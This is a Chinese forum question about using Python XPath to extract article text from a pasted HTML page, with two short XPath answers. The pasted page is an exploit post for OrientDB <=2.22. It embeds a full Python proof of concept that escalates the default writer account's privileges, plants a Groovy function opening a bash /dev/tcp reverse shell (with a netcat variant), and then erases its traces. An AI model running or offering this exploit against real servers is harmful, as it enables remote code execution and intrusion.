python用xpath如何提取HTML为问题中固定内容

问题遇到的现象和发生背景
<html>
    <head>
        <meta charset="UTF-8"/>
        <title>OrientDB &lt;=2.22 先锋世道</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
        <meta name="viewport"
              content="width=device-width, initial-scale=1.0, user-scalable=0, minimum-scale=1.0, maximum-scale=1.0"/>
        <link rel="shortcut icon" href="http://0day5.com/usr/themes/DUX/img/favicon.ico"/>
        <meta http-equiv="Cache-Control" content="no-siteapp"/>
        <meta http-equiv="Cache-Control" content="no-transform"/>

        <link rel="stylesheet" href="//cdn.jsdelivr.net/bootstrap/3.2.0/css/bootstrap.min.css" type="text/css"
              media="all"/>
        <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css" type="text/css"
              media="all"/>

        <style>
        </style>

        <script type="text/javascript" src="//cdn.jsdelivr.net/jquery/1.9.1/jquery.min.js"/>
        <!--加载进度条-->
        <link href="//cdn.jsdelivr.net/pace/1.0.2/themes/orange/pace-theme-flash.css" rel="stylesheet"/>
        <script>paceOptions = { elements: {selectors: ['#footer']}};</script>
        <script src="//cdn.jsdelivr.net/pace/1.0.2/pace.min.js"/>
        <!--[if lt IE 9]><script src="//cdn.jsdelivr.net/html5shiv/3.7.3/html5shiv.min.js"></script><![endif]-->

        <meta name="description"
              content="关于OrientDBOrientDB是一个分布式图形数据库引擎,具有文档数据库的灵活性,一体化的产品。第一个也是最好的可升级,高性能,可操作的NoSQL数据库。Vulnerability Det..."/>
        <meta name="keywords" content="OrientDB"/>
        <script type="text/javascript">
            (function () {
            var event = document.addEventListener ? {
            add: 'addEventListener',
            triggers: ['scroll', 'mousemove', 'keyup', 'touchstart'],
            load: 'DOMContentLoaded'
            } : {
            add: 'attachEvent',
            triggers: ['onfocus', 'onmousemove', 'onkeyup', 'ontouchstart'],
            load: 'onload'
            }, added = false;

            document[event.add](event.load, function () {
            var r = document.getElementById('respond-post-4424'),
            input = document.createElement('input');
            input.type = 'hidden';
            input.name = '_';
            input.value = (function () {
            var _2lc = 'f20'//'Rws'
            +//'3'
            '3'+//'i'
            'da3'+//'huy'
            '371'+//'0yg'
            'dbf'+'qb'//'qb'
            +//'Ak2'
            'df'+/* 'r'//'r' */''+'7'//'bm9'
            +//'tuH'
            'c4'+'7'//'5'
            +'d'//'FCP'
            +'052'//'nG4'
            +'eb6'//'umS'
            +'7'//'Ray'
            +//'TV9'
            '1'+'331'//'L'
            +//'O'
            'b9', _82D = [[3,4],[12,14]];

            for (var i = 0; i &lt; _82D.length; i ++) {
            _2lc = _2lc.substring(0, _82D[i][0]) + _2lc.substring(_82D[i][1]);
            }

            return _2lc;
            })();

            if (null != r) {
            var forms = r.getElementsByTagName('form');
            if (forms.length &gt; 0) {
            function append() {
            if (!added) {
            forms[0].appendChild(input);
            added = true;
            }
            }

            for (var i = 0; i &lt; event.triggers.length; i ++) {
            var trigger = event.triggers[i];
            document[event.add](trigger, append);
            window[event.add](trigger, append);
            }
            }
            }
            });
            })();
        </script>
    </head>

    <body class="single">
        <div class="site-search">
            <div class="container">
                <form method="get" class="site-search-form">
                    <input class="search-input" name="s" type="text" placeholder="输入关键字" value=""/>
                    <button class="search-btn" type="submit">
                        <i class="fa fa-search"/>
                    </button>
                </form>
            </div>
        </div>
        <!--header-->
        <section class="container">
            <div class="content-wrap">
                <div class="content">
                    <header class="article-header">
                        <h1 class="article-title">
                            <a>OrientDB &lt;=2.22 代码执行</a>
                        </h1>
                        <div class="article-meta">
                            <span class="item">2017-07-15</span>
                            <span class="item">分类:<a>Windows</a> /
                                <a>Linux/Unix</a>
                            </span>
                            <span class="item post-views">阅读(64516)</span>
                            <span class="item">评论(0)</span>
                        </div>
                    </header>
                    <article class="article-content">
                        <p>
                            <strong>关于OrientDB</strong>
                        </p>
                        <p>OrientDB是一个分布式图形数据库引擎,具有文档数据库的灵活性,一体化的产品。第一个也是最好的可升级,高性能,可操作的NoSQL数据库。</p>
                        <p>
                            <strong>Vulnerability Details</strong>
                            <br/>OrientDB uses RBAC model for authentication schemes. By default an OrientDB has 3 roles
                            –<strong>admin</strong>, <strong>writer</strong> and <strong>reader</strong>. These have
                            their usernames same as the role. For each database created on the server, it assigns by
                            default these 3 users.
                        </p>
                        <p>The privileges of the users are:</p>
                        <p>
                            <strong>admin</strong>
                            – access to all functions on the database without any limitation
                            <br/>
                            <strong>reader</strong>
                            – read-only user. The reader can query any records in the database, but can’t modify or
                            delete them. It has no access to internal information, such as the users and roles
                            themselves
                            <br/>
                            <strong>writer</strong>
                            – same as the "reader", but it can also create, update and delete records<br/>ORole​
                            structure handles users and their roles and is only accessible by the admin user. OrientDB
                            requires oRole read permissions to allow the user to display the permissions of users and
                            make other queries associated with oRole permissions.
                        </p>
                        <p>From version 2.2.x and above whenever the oRole is queried with a where, fetchplan and order
                            by statements​, this permission requirement is not required and information is returned to
                            unprivileged users.
                        </p>
                        <p>Since we enable the functions <code>where</code>, <code>fetchplan</code> and <code>order
                            by</code>, and OrientDB has a function where you could execute groovy functions and this <code>
                            groovy
                        </code> wrapper doesn’t have a sandbox and exposes system functionalities, we can run any
                            command we want.
                        </p>
                        <h3>poc</h3>
                        <pre>
                            <code class="lang-python">#! /usr/bin/env python
                                #-*- coding: utf-8 -*-
                                import sys
                                import requests
                                import json
                                import string
                                import random

                                target = sys.argv[1]

                                try:
                                port = sys.argv[2] if sys.argv[2] else 2480
                                except:
                                port = 2480

                                url =
                                "http://%s:%s/command/GratefulDeadConcerts/sql/-/20?format=rid,type,version,class,graph"%(target,port)


                                def random_function_name(size=5, chars=string.ascii_lowercase + string.digits):
                                return ''.join(random.choice(chars) for _ in range(size))

                                def enum_databases(target,port="2480"):

                                base_url = "http://%s:%s/listDatabases"%(target,port)
                                req = requests.get(base_url)

                                if req.status_code == 200:
                                #print "[+] Database Enumeration successful"
                                database = req.json()['databases']

                                return database

                                return False

                                def check_version(target,port="2480"):
                                base_url = "http://%s:%s/listDatabases"%(target,port)
                                req = requests.get(base_url)

                                if req.status_code == 200:

                                headers = req.headers['server']
                                #print headers
                                if "2.2" in headers or "3." in headers:
                                return True

                                return False

                                def run_queries(permission,db,content=""):

                                databases = enum_databases(target)

                                url =
                                "http://%s:%s/command/%s/sql/-/20?format=rid,type,version,class,graph"%(target,port,databases[0])

                                priv_enable = ["create","read","update","execute","delete"]
                                #query = "GRANT create ON database.class.ouser TO writer"

                                for priv in priv_enable:

                                if permission == "GRANT":
                                query = "GRANT %s ON %s TO writer"%(priv,db)
                                else:
                                query = "REVOKE %s ON %s FROM writer"%(priv,db)
                                req = requests.post(url,data=query,auth=('writer','writer'))
                                if req.status_code == 200:
                                pass
                                else:
                                if priv == "execute":
                                return True
                                return False

                                print "[+] %s"%(content)
                                return True

                                def priv_escalation(target,port="2480"):

                                print "[+] Checking OrientDB Database version is greater than 2.2"

                                if check_version(target,port):

                                priv1 = run_queries("GRANT","database.class.ouser","Privilege Escalation done checking
                                enabling operations on database.function")
                                priv2 = run_queries("GRANT","database.function","Enabled functional operations on
                                database.function")
                                priv3 = run_queries("GRANT","database.systemclusters","Enabling access to system
                                clusters")

                                if priv1 and priv2 and priv3:
                                return True

                                return False

                                def exploit(target,port="2480"):

                                #query =
                                '"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"most","language":"groovy","code":"def
                                command = \'bash -i &gt;&amp; /dev/tcp/0.0.0.0/8081 0&gt;&amp;1\';File file = new
                                File(\"hello.sh\");file.delete();file &lt;&lt; (\"#!/bin/bash\\n\");file &lt;&lt;
                                (command);def proc = \"bash hello.sh\".execute(); ","parameters":null'

                                #query =
                                {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"ost","language":"groovy","code":"def
                                command = 'whoami';File file = new File(\"hello.sh\");file.delete();file &lt;&lt;
                                (\"#!/bin/bash\\n\");file &lt;&lt; (command);def proc = \"bash hello.sh\".execute();
                                ","parameters":None}

                                func_name = random_function_name()

                                print func_name

                                databases = enum_databases(target)

                                reverse_ip = raw_input('Enter the ip to connect back: ')

                                query =
                                '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def
                                command = \'bash -i &gt;&amp; /dev/tcp/'+reverse_ip+'/8081 0&gt;&amp;1\';File file = new
                                File(\\"hello.sh\\");file.delete();file &lt;&lt; (\\"#!/bin/bash\\\\n\\");file &lt;&lt;
                                (command);def proc = \\"bash hello.sh\\".execute();","parameters":null}'
                                #query =
                                '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def
                                command = \'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 0.0.0.0 8081
                                &gt;/tmp/f\' \u000a File file = new File(\"hello.sh\")\u000a file.delete() \u000a file
                                &lt;&lt; (\"#!/bin/bash\")\u000a file &lt;&lt; (command)\n def proc = \"bash
                                hello.sh\".execute() ","parameters":null}'
                                #query =
                                {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"lllasd","language":"groovy","code":"def
                                command = \'bash -i &gt;&amp; /dev/tcp/0.0.0.0/8081 0&gt;&amp;1\';File file = new
                                File(\"hello.sh\");file.delete();file &lt;&lt; (\"#!/bin/bash\\n\");file &lt;&lt;
                                (command);def proc = \"bash hello.sh\".execute();","parameters":None}
                                req =
                                requests.post("http://%s:%s/document/%s/-1:-1"%(target,port,databases[0]),data=query,auth=('writer','writer'))

                                if req.status_code == 201:

                                #print req.status_code
                                #print req.json()

                                func_id = req.json()['@rid'].strip("#")
                                #print func_id

                                print "[+] Exploitation successful, get ready for your shell.Executing %s"%(func_name)

                                req =
                                requests.post("http://%s:%s/function/%s/%s"%(target,port,databases[0],func_name),auth=('writer','writer'))
                                #print req.status_code
                                #print req.text

                                if req.status_code == 200:
                                print "[+] Open netcat at port 8081.."
                                else:
                                print "[+] Exploitation failed at last step, try running the script again."
                                print req.status_code
                                print req.text

                                #print "[+] Deleting traces.."

                                req =
                                requests.delete("http://%s:%s/document/%s/%s"%(target,port,databases[0],func_id),auth=('writer','writer'))
                                priv1 = run_queries("REVOKE","database.class.ouser","Cleaning Up..database.class.ouser")
                                priv2 = run_queries("REVOKE","database.function","Cleaning Up..database.function")
                                priv3 = run_queries("REVOKE","database.systemclusters","Cleaning
                                Up..database.systemclusters")

                                #print req.status_code
                                #print req.text

                                def main():

                                target = sys.argv[1]
                                #port = sys.argv[1] if sys.argv[1] else 2480
                                try:
                                port = sys.argv[2] if sys.argv[2] else 2480
                                #print port
                                except:
                                port = 2480
                                if priv_escalation(target,port):
                                exploit(target,port)
                                else:
                                print "[+] Target not vulnerable"

                                main()
                            </code>
                        </pre>
                    </article>

                    <div class="article-tags">标签:
                        <a>OrientDB &lt;=2.22 代码执行</a>

                        <a>OrientDB</a>
                    </div>

                    <div class="title" id="comments">
                        <h3>评论
                            <small/>
                        </h3>
                    </div>
                </div>
            </div>
            <!-- start sidebar -->
            <!-- end sidebar -->
        </section>


        <!--footer-->

        <footer id="footer" class="footer">

            <div class="container">
                时代先锋@2000-2022

                <div class="hide"/>

            </div>

        </footer>

        <script src="//cdn.jsdelivr.net/highlight.js/9.11.0/highlight.min.js"/>

        <script>

            window.jsui={

            www: 'http://0day5.com/',

            uri: 'http://0day5.com/usr/themes/DUX',

            ver: '1.0',

            roll: ["1",],

            ajaxpager: '0'

            };

        </script>

        <script type="text/javascript" src="//cdn.jsdelivr.net/bootstrap/3.2.0/js/bootstrap.min.js"/>

        <!-- Analytics code -->


    </body>

</html>
我想要达到的结果
关于OrientDB

OrientDB是一个分布式图形数据库引擎,具有文档数据库的灵活性,一体化的产品。第一个也是最好的可升级,高性能,可操作的NoSQL数据库。

Vulnerability Details
OrientDB uses RBAC model for authentication schemes. By default an OrientDB has 3 roles – admin, writer and reader. These have their usernames same as the role. For each database created on the server, it assigns by default these 3 users.

The privileges of the users are:

admin – access to all functions on the database without any limitation
reader – read-only user. The reader can query any records in the database, but can’t modify or delete them. It has no access to internal information, such as the users and roles themselves
writer – same as the "reader", but it can also create, update and delete records
ORole​ structure handles users and their roles and is only accessible by the admin user. OrientDB requires oRole read permissions to allow the user to display the permissions of users and make other queries associated with oRole permissions.

From version 2.2.x and above whenever the oRole is queried with a where, fetchplan and order by statements​, this permission requirement is not required and information is returned to unprivileged users.

Since we enable the functions where, fetchplan and order by, and OrientDB has a function where you could execute groovy functions and this groovy wrapper doesnt have a sandbox and exposes system functionalities, we can run any command we want.

获取所有标签的文本???
试试这样呢


xpath('//*/text()')

这条xpath应该可以满足你: //article//p//text()